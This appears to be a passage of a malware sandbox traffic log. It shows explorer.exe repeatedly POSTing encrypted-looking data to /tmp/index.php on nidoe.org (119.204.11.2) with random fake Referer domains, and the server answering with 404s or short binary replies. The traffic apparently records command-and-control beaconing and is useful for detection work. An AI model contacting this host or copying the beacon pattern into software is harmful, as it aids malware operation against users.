Apr 26, 2024 11:47:29.304265022 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://guijonadpodebyqi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 343 Host: nidoe.org
Apr 26, 2024 11:47:29.304290056 CEST	343	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2e 0b dd f2 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA -[k,vu.[VO$ge(`R}3;IoPVLvW,1iB-4jDs-v-XsXs?-kbyO6m6J0-
Apr 26, 2024 11:47:30.499388933 CEST	163	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:47:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49717	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:47:30.826078892 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uhlohybvnslbwb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 159 Host: nidoe.org
Apr 26, 2024 11:47:30.826106071 CEST	159	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 3e 23 ce a2 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA -[k,vu>#ERQz!%0 O8A{7H?Z>:UT2:
Apr 26, 2024 11:47:32.017399073 CEST	163	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:47:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:47:32.343784094 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dnxsraqaaam.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 277 Host: nidoe.org
Apr 26, 2024 11:47:32.343822002 CEST	277	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 2e 5c bc 9f Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA -[k,vu.\>UAty%{4pv+eE^8B&7XG@`{)sqcZ_FO[1CEF%UskGft+z"E^=,0`
Apr 26, 2024 11:47:33.586575985 CEST	510	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:47:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49719	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:47:33.917741060 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jritymeowitfd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: nidoe.org
Apr 26, 2024 11:47:33.917766094 CEST	126	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 55 07 bc a0 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA -[k,vuUaGO`EQB+S9
Apr 26, 2024 11:47:34.821923971 CEST	510	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:47:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49720	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:47:35.150964975 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ylocvbbjhcotul.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: nidoe.org
Apr 26, 2024 11:47:35.151002884 CEST	363	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2a 34 ad b9 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA -[k,vu4{irc`NT:;&^2ZwBOMpl!EZ2HpC[sM~R}YSRAh=PX^r!:Ka
Apr 26, 2024 11:47:36.358182907 CEST	510	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:47:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49722	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:48:43.367328882 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lyvgfxwmddcnfb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: nidoe.org
Apr 26, 2024 11:48:43.367362976 CEST	338	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 29 f1 bd Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuC)P4@AO5s@dnu7v:#<cJf9*[X\@!!="h-{C~F\|KOoU1+1
Apr 26, 2024 11:48:44.553025007 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:48:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49723	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:48:44.986284971 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qipuwsetjdsly.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 146 Host: nidoe.org
Apr 26, 2024 11:48:44.986316919 CEST	146	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 43 ab 99 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuyCH$pBN\|L?."rUnKhB;k#:i%
Apr 26, 2024 11:48:46.168170929 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:48:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49724	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:48:46.715630054 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sitrlilwixmijdwa.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 285 Host: nidoe.org
Apr 26, 2024 11:48:46.715683937 CEST	285	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 25 c5 bd Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu\|%JUYD{1JXamqcSc-ZA,H_IMDR@nnP&%Povnz]sH%+1zg5<y{o{WK
Apr 26, 2024 11:48:47.913717985 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:48:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49725	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:48:48.305830002 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lkfxkpohfrqcuf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: nidoe.org
Apr 26, 2024 11:48:48.305830956 CEST	151	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 47 4f a7 9d Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuGOF`z0!My<"Jm36U&YL)Z!>4,'L
Apr 26, 2024 11:48:49.475702047 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:48:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49726	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:48:50.067756891 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ymaqoerhmbiko.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 179 Host: nidoe.org
Apr 26, 2024 11:48:50.067790985 CEST	179	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4f 2c b5 8a Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuO,wBg$R1;MG`m]y>IZ70%ufg"DIq?Y
Apr 26, 2024 11:48:51.259509087 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:48:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49727	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:48:53.977641106 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lifcehnnpyaunk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 328 Host: nidoe.org
Apr 26, 2024 11:48:53.977664948 CEST	328	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 32 e8 ab Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu>2h1BBZ[f$G$V@`h[L@@(@W_<.{KD+(K]I&2R>f+AeAamQ-
Apr 26, 2024 11:48:55.158829927 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:48:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49728	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:48:55.896378040 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bmvswhlxjuxjpf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 302 Host: nidoe.org
Apr 26, 2024 11:48:55.896392107 CEST	302	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 35 c1 81 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu`5Z*E1Zr$'=h1kbjW:-&DM@NN~#ZQkqe%\|q[15-&~ T`uE6h
Apr 26, 2024 11:48:57.080249071 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:48:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49729	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:48:57.550009012 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://chqvujyrjfo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: nidoe.org
Apr 26, 2024 11:48:57.550569057 CEST	358	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 71 21 ca b8 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuq!ae]V6V_M/oc(TX P.,c:W:J8=b<I}Kq,t@5 9cQyuzMqAiuqlUEw
Apr 26, 2024 11:48:58.732377052 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:48:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49730	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:49:00.896944046 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jldhvcofgpoohdqq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 114 Host: nidoe.org
Apr 26, 2024 11:49:00.896979094 CEST	114	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3f 37 a5 9a Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu?7vDkq46~"9zP
Apr 26, 2024 11:49:02.087163925 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:49:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49731	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:49:05.885668993 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dpmkxcqjquv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 135 Host: nidoe.org
Apr 26, 2024 11:49:05.885682106 CEST	135	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 21 45 e4 ae Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu!ELDnO2QS<@i\|hcM?[ S*Q
Apr 26, 2024 11:49:07.073163986 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:49:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49732	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:49:12.723020077 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vxtsdxtdlktwbdnl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: nidoe.org
Apr 26, 2024 11:49:12.723020077 CEST	301	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 2f ad fe Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuX/CgQ[gV^E){8i.VH\,^#nRYb<C(pyi4E$]V*kf!85BBZpxVNu6\|x55s
Apr 26, 2024 11:49:13.929617882 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:49:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49733	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:49:18.365467072 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://abowpkrstiub.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 295 Host: nidoe.org
